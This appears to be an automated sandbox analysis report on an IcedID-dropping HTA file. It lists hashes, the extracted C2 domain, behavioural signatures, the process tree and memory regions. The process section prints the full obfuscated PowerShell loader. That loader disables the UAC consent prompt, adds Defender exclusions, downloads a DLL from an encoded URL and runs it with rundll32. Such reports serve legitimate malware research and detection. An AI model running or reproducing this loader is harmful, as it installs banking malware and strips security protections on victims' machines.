Analysis
-
max time kernel
599s -
max time network
611s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-06-2022 16:06
Static task
static1
Behavioral task
behavioral1
Sample
etest.hta
Resource
win7-20220414-en
General
-
Target
etest.hta
-
Size
99KB
-
MD5
84df3cea303f0410a2a70580b9155bf5
-
SHA1
987eed81fa0822853cb9f826994e75102e086694
-
SHA256
248b6a65b656872525904122e75bd374b772e27c2a8fc6040ec6582fd207e536
-
SHA512
610b39ec2989225794d0b12ef451bddc4bc4f3f77cd2159d9396ca425524256f17ea12b17957070a94704b5aa1a0b5fe5f915dd9d3c610aecc767315e1977616
Malware Config
Extracted
icedid
3289900935
ilzenhwery.com
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exerundll32.exeflow pid process 12 1896 powershell.exe 28 4072 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 4932 rundll32.exe 4072 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exerundll32.exepid process 1896 powershell.exe 1896 powershell.exe 4072 rundll32.exe 4072 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1896 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
mshta.exepowershell.exerundll32.exedescription pid process target process PID 3792 wrote to memory of 1896 3792 mshta.exe powershell.exe PID 3792 wrote to memory of 1896 3792 mshta.exe powershell.exe PID 3792 wrote to memory of 1896 3792 mshta.exe powershell.exe PID 1896 wrote to memory of 4932 1896 powershell.exe rundll32.exe PID 1896 wrote to memory of 4932 1896 powershell.exe rundll32.exe PID 1896 wrote to memory of 4932 1896 powershell.exe rundll32.exe PID 4932 wrote to memory of 4072 4932 rundll32.exe rundll32.exe PID 4932 wrote to memory of 4072 4932 rundll32.exe rundll32.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\etest.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac2⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
C:\Users\Admin\AppData\Roaming\test.dllFilesize
858KB
MD5f0b052dad1a3605cd3e6d044cd315388
SHA1fe3d8f50b494f400bd47842d580343f38be6a04b
SHA2564798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
SHA512c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
memory/1896-142-0x0000000073310000-0x000000007335C000-memory.dmpFilesize
304KB
-
memory/1896-144-0x00000000083D0000-0x0000000008A4A000-memory.dmpFilesize
6.5MB
-
memory/1896-135-0x00000000058E0000-0x0000000005946000-memory.dmpFilesize
408KB
-
memory/1896-136-0x0000000005EF0000-0x0000000005F0E000-memory.dmpFilesize
120KB
-
memory/1896-137-0x0000000006F50000-0x0000000006FE6000-memory.dmpFilesize
600KB
-
memory/1896-138-0x0000000006450000-0x000000000646A000-memory.dmpFilesize
104KB
-
memory/1896-139-0x00000000064C0000-0x00000000064E2000-memory.dmpFilesize
136KB
-
memory/1896-140-0x00000000077A0000-0x0000000007D44000-memory.dmpFilesize
5.6MB
-
memory/1896-141-0x00000000072B0000-0x00000000072E2000-memory.dmpFilesize
200KB
-
memory/1896-130-0x0000000000000000-mapping.dmp
-
memory/1896-143-0x0000000007290000-0x00000000072AE000-memory.dmpFilesize
120KB
-
memory/1896-134-0x0000000005870000-0x00000000058D6000-memory.dmpFilesize
408KB
-
memory/1896-145-0x0000000007480000-0x000000000748A000-memory.dmpFilesize
40KB
-
memory/1896-146-0x0000000007630000-0x000000000763E000-memory.dmpFilesize
56KB
-
memory/1896-147-0x0000000007690000-0x00000000076AA000-memory.dmpFilesize
104KB
-
memory/1896-148-0x0000000007680000-0x0000000007688000-memory.dmpFilesize
32KB
-
memory/1896-131-0x0000000002620000-0x0000000002656000-memory.dmpFilesize
216KB
-
memory/1896-133-0x0000000004F90000-0x0000000004FB2000-memory.dmpFilesize
136KB
-
memory/1896-132-0x0000000005150000-0x0000000005778000-memory.dmpFilesize
6.2MB
-
memory/4072-152-0x0000000000000000-mapping.dmp
-
memory/4072-154-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/4932-149-0x0000000000000000-mapping.dmp